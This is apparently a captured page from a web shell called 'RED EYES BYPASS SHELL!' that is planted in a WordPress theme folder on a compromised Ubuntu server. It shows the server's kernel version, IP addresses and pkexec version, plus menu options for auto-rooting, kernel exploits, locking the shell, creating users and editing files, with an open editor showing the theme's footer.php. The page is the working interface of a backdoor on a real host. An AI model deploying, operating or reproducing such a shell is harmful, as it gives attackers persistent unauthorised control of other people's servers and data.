Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
bbpress
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lifterlms
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tribe
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
404.php
403
B
-rwxr-xr-x
500.php
887
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
accessibility.txt
2.1
KB
-rwxr-xr-x
changelog.txt
50.31
KB
-rwxr-xr-x
comments.php
1010
B
-rwxr-xr-x
footer.php
725
B
-rwxr-xr-x
functions.php
955
B
-rwxr-xr-x
header.php
1.24
KB
-rwxr-xr-x
index.php
284
B
-rwxr-xr-x
offline.php
948
B
-rwxr-xr-x
page.php
322
B
-rwxr-xr-x
readme.txt
54.44
KB
-rwxr-xr-x
screenshot.png
278.59
KB
-rwxr-xr-x
sidebar.php
841
B
-rwxr-xr-x
single.php
322
B
-rwxr-xr-x
style.css
1.32
KB
-rwxr-xr-x
theme.json
3.2
KB
-rwxr-xr-x
wpml-config.xml
2.76
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package kadence */ namespace Kadence; if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Hook for bottom of inner wrap. */ do_action( 'kadence_after_content' ); ?> </main><!-- #inner-wrap --> <?php do_action( 'kadence_before_footer' ); /** * Kadence footer hook. * * @hooked Kadence/footer_markup - 10 */ do_action( 'kadence_footer' ); do_action( 'kadence_after_footer' ); ?> </div><!-- #wrapper --> <?php do_action( 'kadence_after_wrapper' ); ?> <?php wp_footer(); ?> </body> </html>
Close